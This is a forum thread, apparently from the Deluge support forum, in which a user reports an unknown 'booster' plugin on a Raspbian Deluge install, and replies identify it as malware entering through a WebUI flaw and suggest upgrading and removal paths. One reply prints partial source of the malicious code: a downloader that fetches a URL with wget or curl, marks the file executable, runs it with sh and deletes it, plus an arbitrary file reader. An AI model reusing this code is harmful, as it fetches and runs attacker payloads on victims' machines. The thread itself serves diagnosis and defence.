Admin Edit: Upgrade to 1.3.15 to fix this vulnerability
I don't remember adding this plugin called booster. It was enabled under my plugins. I have uploaded the booster.egg here. Keep in mind that an .egg file can be opened as a .zip file... I can't find reference to this plugin ANYWHERE on the internet. Sorry if I'm being paranoid. I looked at the source and it seems to download and execute stuff :S
I am running deluge/deluge-web on Raspbian
https://drive.google.com/file/d/0B23kWK ... sp=sharing
[WebUI Vulnerability] Malicious plugin "booster" found on my system
Re: Malicious plugin "booster" found on my system?
If your webui is open to the internet it likely is a malicious egg utilising a know security flaw.
Upgrade to 1.3.15 as it has webui security fixes.
Upgrade to 1.3.15 as it has webui security fixes.
Re: Malicious plugin "booster" found on my system?
Also you should report this to debian as a serious security issue
Re: Malicious plugin "booster" found on my system?
It definitely is malicious, it is modified execute plugin code.
Re: Malicious plugin "booster" found on my system?
My bad, i misunderstood, thought it was Boost.Python. Don't know why. My bad
Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system
Oh sh!t, didn't expect it to be this bad... any idea what it might have downloaded? are there any paths that I can check?
Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system
There is likely no way to know for sure.
For reference this is partial summary of code added to the execute plugin:
For reference this is partial summary of code added to the execute plugin:
Code: Select all
def looking_file(name):
epath = os.environ.get("PATH", None)
if not epath: epath = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/sbin", "/bin")
for p in epath.split(":"):
testname = p + "/" + name
if os.path.exists(testname) and os.access(testname, os.X_OK):
return testname
return None
def internal_download(url, to):
if sys.version_info[0] == 3:
import urllib.request
urllib.request.urlretrieve(url, to)
else:
import urllib
urllib.urlretrieve(url, to)
def yahoo(URL):
wget = looking_file("wget")
curl = looking_file("curl")
cmd = None
if wget:
cmd = wget + " -t 0 -T 15 -q --no-check-certificate -O %s %s"
elif curl:
cmd = curl + " --retry 0 --connect-timeout 15 -k -q -o %s %s "
tmpfile = tempfile.mkstemp()
tmpname = tmpfile[1]
os.fdopen(tmpfile[0]).close()
if cmd:
try:
tcmd = cmd % (tmpname, URL)
Popen(tcmd, shell = True, stdout = PIPE, stderr = PIPE).communicate()
except:
pass
else:
try:
if not os.path.exists(tmpname) or os.path.getsize(tmpname) == 0:
internal_download(URL, tmpname)
except Exception as err:
return str(err)
if os.path.exists(tmpname) and os.path.getsize(tmpname) > 0:
try:
os.chmod(tmpname, 0555)
Popen("sh %s &" % tmpname, shell = True, stdout = PIPE, stderr = PIPE).communicate()
time.sleep(2)
os.remove(tmpname)
except Exception as err:
return str(err)
return "OK"
def get_file(self, filename):
if os.path.exists(filename):
fp = open(filename)
data = fp.read()
fp.close()
return data
else:
return "FILE %s not exists" % filename
Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system
How do you remove this malware?
Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system
I am not for sure on this as I have never had the issue, but on my system plugins are saved ineb98jdb wrote:How do you remove this malware?
/home/[USER NAME]/.config/deluge/plugins
and also
/home/[USER NAME]/.cache/Python-Eggs/
I would shut down deluge and remove them from there as a first step.